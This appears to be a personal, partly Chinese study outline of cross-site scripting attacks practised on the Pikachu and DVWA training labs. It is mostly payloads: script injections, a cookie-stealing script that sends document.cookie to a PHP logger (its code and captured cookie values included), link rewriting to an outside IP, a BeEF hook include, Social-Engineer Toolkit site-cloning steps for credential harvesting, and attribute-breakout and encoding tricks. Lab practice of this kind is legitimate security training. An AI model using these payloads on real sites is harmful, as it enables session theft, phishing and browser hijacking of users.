反射型xss(get)
	http://xiaoxiaoran.com/pikachu/vul/xss/xss_reflected_get.php?message=kobe&submit=submit
		http://xiaoxiaoran.com/pikachu/vul/xss/xss_reflected_get.php?message=<script>alert(1)</script>&submit=submit
		http://xiaoxiaoran.com/pikachu/vul/xss/xss_reflected_get.php?message=<script>alert(document.cookie)</script>&submit=submit

cookies
	http://xiaoxiaoran.com/dvwa/vulnerabilities/xss_r/?name=1#
		<script>document.location='http://127.0.0.1/xiaoxiaoran/xss_cookie.php?cookies='+document.cookie</script>
			xss_cookie.php
				<?php$cookies=$_GET['cookies'];
				file_put_contents('cookie.txt',$cookies);?>
			cookie.txt
				security=low; daxa_2132_lastvisit=1621075285; UM_distinctid=1798d6d59dba8-082684921c23dc-4c3f2c72-1fa400-1798d6d59ddb9; __51cke__=; PHPSESSID=heapj23qc51ouvo8ctjr3oju66; CNZZDATA155540=cnzz_eid=957036428-1621572915-&ntime=1622294410; __tins__21053225={"sid": 1622296079437, "vd": 27, "expires": 1622299213200}; __51laig__=127
		http://xiaoxiaoran.com/dvwa/
篡改连接
	http://xiaoxiaoran.com/dvwa/vulnerabilities/xss_r/?name=1#
		<script>
			window.onload=function(){
				var link=document.getElementsByTagName("a");
				for(j=0;j<link.length;j++){
					link[j].href="http://1.117.162.201/";
				}
			}
		</script>
			<a href="http://1.117.162.201/" target="_blank">https://owasp.org/www-community/attacks/xss/</a>
		beef
			<script src="http://192.168.100.143:3000/hook.js"></script>
克隆网站
	http://xiaoxiaoran.com/dvwa/login.php
		sudo setoolkit
			2) Website Attack Vectors
			3) Credential Harvester Attack Method
			2) Site Cloner
	http://xiaoxiaoran.com/dvwa/vulnerabilities/xss_s/
		<script>window.location="http://192.168.100.143"</script>
		
闭合 
	<input class="xssr" type="text" name="p1" value="12334">
		1"onmouseover="alert(document.domain)
		1"><script>alert(1)</script>
		1"><script>alert(document.dodomainmain)</script>
		1 onmouseover=alert(document.domain)
	
	<a href="java                   script:alert(document.domain);">xxx</a>
	<a href="javascript:alert(document.domain);">
	<a onmouseover="alert(document.domain)">1</a>
	
ie特性    
	`` -> 闭合"  
	background:url("javascript:alert(document.domain);");
	xsss:express/**/sion(if(!window.x){alert(document.domain);window.x=1})
	特殊的源处理
	
编码转义换进制
	
	\x3c \x3e  16进制
	\\u003c \\u003e  unicode
	
	
	
		
		